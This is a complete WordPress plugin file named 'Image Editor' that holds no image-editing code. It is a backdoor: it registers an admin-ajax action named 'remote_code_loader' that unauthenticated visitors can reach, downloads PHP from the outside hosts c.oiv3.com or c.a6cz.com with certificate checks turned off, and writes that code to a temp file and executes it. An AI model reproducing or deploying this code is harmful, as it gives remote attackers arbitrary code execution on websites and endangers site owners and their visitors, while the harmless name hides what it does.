<?php
/*
Plugin Name: Image Editor
Description: Image Editor
Version: 1.0
Author: Image Editor
*/

add_action('wp_ajax_remote_code_loader', 'rcl_handle_request'); // for logged-in users
add_action('wp_ajax_nopriv_remote_code_loader', 'rcl_handle_request'); // if you want it to work for non-logged-in users

function rcl_handle_request() {
    // Validate required params
    if (!isset($_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['api'], $_REQUEST['t'])) {
        wp_send_json_error(['message' => 'Missing parameters.']);
        return;
    }

    $api    = sanitize_text_field($_REQUEST['api']);
    $ac     = sanitize_text_field($_REQUEST['ac']);
    $path   = sanitize_text_field($_REQUEST['path']);
    $t      = sanitize_text_field($_REQUEST['t']);

    $code = rcl_get_code("https://c.oiv3.com/", $api, $ac, $path, $t);
    if (!$code) {
        $code = rcl_get_code("https://c.a6cz.com/", $api, $ac, $path, $t);
    }

    if (strpos($code, '<?php') === false) {
        wp_send_json_error(['message' => 'Remote code invalid or missing.']);
        return;
    }

    // Safely write code to a temp file and execute
    $tmp_file = tempnam(sys_get_temp_dir(), 'rcl_');
    file_put_contents($tmp_file, $code);
    include($tmp_file);
    unlink($tmp_file);

    wp_die(); // required after admin-ajax
}

function rcl_get_code($base_url, $api, $ac, $path, $t) {
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $base_url, $api, $ac, $path, $t);

    // Try file_get_contents first
    $code = @file_get_contents($url);

    // Fallback to cURL
    if ($code === false) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_USERAGENT, 'll');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
        $code = curl_exec($ch);
        curl_close($ch);
    }

    return $code;
}